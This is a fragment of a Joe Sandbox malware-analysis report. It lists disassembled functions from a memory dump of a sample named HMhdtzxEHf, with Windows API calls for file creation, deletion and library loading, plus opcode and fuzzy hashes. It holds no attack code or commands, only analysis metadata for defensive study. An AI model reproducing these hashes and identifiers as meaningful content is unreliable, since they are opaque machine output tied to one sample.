                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2260680371-0
                                                                                            • Opcode ID: e114eb16753bcbe44963ab831a50dce421bbc2c43ea33e8957d969501e39f298
                                                                                            • Instruction ID: 3ed04bf6a9cde8b29f787e09cfaf92c51c1d9805e722c781e8eff13b48ba25f2
                                                                                            • Opcode Fuzzy Hash: e114eb16753bcbe44963ab831a50dce421bbc2c43ea33e8957d969501e39f298
                                                                                            • Instruction Fuzzy Hash: 0101D8395002306AEF21ABF59C49FFE335CAF29781F044414F982EA091D764CA82C6B6
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A5B8B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID:
                                                                                            • API String ID: 1807457897-3916222277
                                                                                            • Opcode ID: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
                                                                                            • Instruction ID: 03d1542b240be4011b9cd2ee04c05adc3f982fef929f6158a547a224d85b95b0
                                                                                            • Opcode Fuzzy Hash: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
                                                                                            • Instruction Fuzzy Hash: FD41F87050428C9EDF218F658C84BE6BBB9FB55306F1404EDEA9A86142D335AA49CB70
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00A5AFDD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: String
                                                                                            • String ID: LCMapStringEx
                                                                                            • API String ID: 2568140703-3893581201
                                                                                            • Opcode ID: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
                                                                                            • Instruction ID: 5949f6f4ea2154a087a8641c8de5dab711559f6879358a6913c0753bbc1506f9
                                                                                            • Opcode Fuzzy Hash: 44730317c8ba9388734f3595d96b95552aa91eebf695ff0302b18d809557663c
                                                                                            • Instruction Fuzzy Hash: F5010872604209BBCF029FA0DD06DEE7FB2FF18755F014654FE1466160CA728A36EB91
                                                                                            APIs
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A5A56F), ref: 00A5AF55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                            • API String ID: 2593887523-3084827643
                                                                                            • Opcode ID: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
                                                                                            • Instruction ID: 457cf5d43c87b95a745005fa735397747c9f7f013d8f465477ae7d55fcad081d
                                                                                            • Opcode Fuzzy Hash: 9817afb956ba0a50191c8454039cb50d0743709574645e12463ee11014390dca
                                                                                            • Instruction Fuzzy Hash: C5F0E972645208BFCF069F94CD02CAD7FB1FF15B12B004554FC085A260DA715E169785
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Alloc
                                                                                            • String ID: FlsAlloc
                                                                                            • API String ID: 2773662609-671089009
                                                                                            • Opcode ID: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
                                                                                            • Instruction ID: 1e4fdf57532631624345fc52431d0b2896ab3175e0702bc242d7b76b1bc04543
                                                                                            • Opcode Fuzzy Hash: 3d703885bbb8a431a560a4bad4bd27ccdc192e59cc9ae44b65319c55b696bfae
                                                                                            • Instruction Fuzzy Hash: 8BE0E5737552187BCB01EBA5DC02A6EBBB4EB65B22B010299FC0597280CDB05E0286D6
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4EAF9
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID: 3Ro
                                                                                            • API String ID: 1269201914-1492261280
                                                                                            • Opcode ID: e26274ebd87ca2327decc46bd0decb6ff002b34821015b6735f5dea9920bc85f
                                                                                            • Instruction ID: 7b75c9990f7efb49ffe2519f3bbbd449f21201c33f1ba8278c9b807b9d730eab
                                                                                            • Opcode Fuzzy Hash: e26274ebd87ca2327decc46bd0decb6ff002b34821015b6735f5dea9920bc85f
                                                                                            • Instruction Fuzzy Hash: A5B0929E29A0427C2D04A2005A06C370128E0C0BA1320952AB401840819C8009010431
                                                                                            APIs
                                                                                              • Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6
                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A5BA89,?,00000000), ref: 00A5BC64
                                                                                            • GetCPInfo.KERNEL32(00000000,00A5BA89,?,?,?,00A5BA89,?,00000000), ref: 00A5BC77
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CodeInfoPageValid
                                                                                            • String ID:
                                                                                            • API String ID: 546120528-0
                                                                                            • Opcode ID: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
                                                                                            • Instruction ID: 7ff9952b4d0d32ed70c544ceb170f809909e3139633e6153b95d4d13079ecb50
                                                                                            • Opcode Fuzzy Hash: 442a0d1dad5494bb688dfece761b28b6c4458e9277726b58ed796a5afdcf2a9e
                                                                                            • Instruction Fuzzy Hash: 1C513476A102459FDB20CF75C8816BAFBF4FF45303F18446ED8968B262D735994ACBA0
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00A39A50,?,?,00000000,?,?,00A38CBC,?), ref: 00A39BAB
                                                                                            • GetLastError.KERNEL32(?,00000000,00A38411,-00009570,00000000,000007F3), ref: 00A39BB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
                                                                                            • Instruction ID: 20490c1d539713d317a8f8d3f7f3de3a04a7b7b813a670f1e7259eba3d054b37
                                                                                            • Opcode Fuzzy Hash: dc493c22af013b94591d6c9caf9b2c1b55931e551625b3a83cd91df98576948a
                                                                                            • Instruction Fuzzy Hash: C3419D71A043018BDB24DF25E58446BF7E5FBD8360F158A2DF89583260D7F0AD458A91
                                                                                            APIs
                                                                                              • Part of subcall function 00A597E5: GetLastError.KERNEL32(?,00A71030,00A54674,00A71030,?,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A597E9
                                                                                              • Part of subcall function 00A597E5: _free.LIBCMT ref: 00A5981C
                                                                                              • Part of subcall function 00A597E5: SetLastError.KERNEL32(00000000,?,00A71030,00000200), ref: 00A5985D
                                                                                              • Part of subcall function 00A597E5: _abort.LIBCMT ref: 00A59863
                                                                                              • Part of subcall function 00A5BB4E: _abort.LIBCMT ref: 00A5BB80
                                                                                              • Part of subcall function 00A5BB4E: _free.LIBCMT ref: 00A5BBB4
                                                                                              • Part of subcall function 00A5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A5BA44,?), ref: 00A5B7E6
                                                                                            • _free.LIBCMT ref: 00A5BA9F
                                                                                            • _free.LIBCMT ref: 00A5BAD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorLast_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2991157371-0
                                                                                            • Opcode ID: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
                                                                                            • Instruction ID: 2a23101a9306d260450a2d50ee02d7a6f7d1dd658d274b0f157a43e7fdfedd34
                                                                                            • Opcode Fuzzy Hash: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
                                                                                            • Instruction Fuzzy Hash: 08310571900209AFDB10EFA8C541B9DB7F5FF40363F214099ED04AB2A2EB769D49CB60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A31E55
                                                                                              • Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF
                                                                                            • _wcslen.LIBCMT ref: 00A31EFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2838827086-0
                                                                                            • Opcode ID: 468daf1b3dd6f7b70e5661b4cb94f57d7b163ee6e75e1cf0a14ebfc0ab3369b0
                                                                                            • Instruction ID: 636ebb6e55fbae258579e5397e067a8a1d1165800d7ec687cba8baf6dbf9ea3d
                                                                                            • Opcode Fuzzy Hash: 468daf1b3dd6f7b70e5661b4cb94f57d7b163ee6e75e1cf0a14ebfc0ab3369b0
                                                                                            • Instruction Fuzzy Hash: 08312876904209AFCF15DF98CA45AEEBBF6BF48300F20446AF845A7251CB365E55CB60
                                                                                            APIs
                                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlushTime
                                                                                            • String ID:
                                                                                            • API String ID: 1392018926-0
                                                                                            • Opcode ID: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
                                                                                            • Instruction ID: f16c6e0693dd17be447acec9718c0f5ef987d86cbfd5aa3a8b1e815d57e1360d
                                                                                            • Opcode Fuzzy Hash: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
                                                                                            • Instruction Fuzzy Hash: 4221E132248386AFC714DF75C892AABBBE8AF95344F08491DF4C587141D3A9E90DDB61
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A39F27,?,?,00A3771A), ref: 00A396E6
                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A39F27,?,?,00A3771A), ref: 00A39716
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
                                                                                            • Instruction ID: 41cb077a74a8474713deadb5b539a3fc17669ac4d176b993c6f27d714fa41f2c
                                                                                            • Opcode Fuzzy Hash: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
                                                                                            • Instruction Fuzzy Hash: D021C1715003446FE3308B65CD8AFA7B7DCEB49320F004A19FA96C21D2C7B8A8858671
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A39EC7
                                                                                            • GetLastError.KERNEL32 ref: 00A39ED4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
                                                                                            • Instruction ID: 41253dddb4ff9336d0d1becd0b22d1a1321ae615a8d870241039b14203a3d8fe
                                                                                            • Opcode Fuzzy Hash: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
                                                                                            • Instruction Fuzzy Hash: BF118231600700ABD724C768CC45BA7B7F9AB45361F608A29F553D26D0D7F0ED4AC660
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A58E75
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00A71098,00A317CE,?,?,00000007,?,?,?,00A313D6,?,00000000), ref: 00A58EB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocAllocate_free
                                                                                            • String ID:
                                                                                            • API String ID: 2447670028-0
                                                                                            • Opcode ID: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
                                                                                            • Instruction ID: f97d1692e20270bea844b94e836ed730222c398d37aadc698e1799521d4ed374
                                                                                            • Opcode Fuzzy Hash: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
                                                                                            • Instruction Fuzzy Hash: B0F0F632201115B6DB216B66AD07BAF3778BF91B73F244126FD18BA191DF7CCD0985A0
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00A410AB
                                                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A410B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                            • String ID:
                                                                                            • API String ID: 1231390398-0
                                                                                            • Opcode ID: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
                                                                                            • Instruction ID: 3fce1b2aadadd9fc557ca335a3ee28ab8bfe95571186ac41e6623e70084a9494
                                                                                            • Opcode Fuzzy Hash: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
                                                                                            • Instruction Fuzzy Hash: 28E09A7BB00149E78F0D8BA49C058AB72EDEAC42043208179E413E3101FA70EE874AA0
                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2673547680-0
                                                                                            • Opcode ID: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
                                                                                            • Instruction ID: 090f8af23d24787055c503e3b57e0f7d0a07f3ea581ef93ecffa4f92412f2af6
                                                                                            • Opcode Fuzzy Hash: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
                                                                                            • Instruction Fuzzy Hash: 2FF0ED32210219BBDF019FA0DC41FDA377CBF14385F488060BA88D61A0DB71CADAEB60
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2643169976-0
                                                                                            APIs
                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00A62641,000000FF), ref: 00A4ACB0
                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00A62641,000000FF), ref: 00A4ACB5
                                                                                            Similarity
                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 3856339756-0
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A254
                                                                                              • Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A280
                                                                                            Similarity
                                                                                            • API ID: AttributesFile$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2673547680-0
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A4DEEC
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00A4DF03
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2718869927-0
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1175261203-0
                                                                                            APIs
                                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA
                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A4A3E1
                                                                                            Similarity
                                                                                            • API ID: BitmapCreateFromGdipStream
                                                                                            • String ID:
                                                                                            • API String ID: 1918208029-0
                                                                                            APIs
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52BAA
                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A52BB5
                                                                                            Similarity
                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                            • String ID:
                                                                                            • API String ID: 1660781231-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: ItemShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3351165006-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A38289
                                                                                              • Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 2506663941-0
                                                                                            APIs
